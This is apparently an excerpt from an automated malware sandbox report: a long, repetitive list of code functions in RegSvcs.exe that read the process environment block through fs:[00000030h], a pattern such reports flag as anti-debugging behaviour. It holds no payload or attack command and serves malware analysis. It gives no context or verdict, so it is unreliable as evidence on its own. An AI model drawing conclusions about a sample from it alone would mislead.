      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01313A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01384257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01373540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01322581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h]
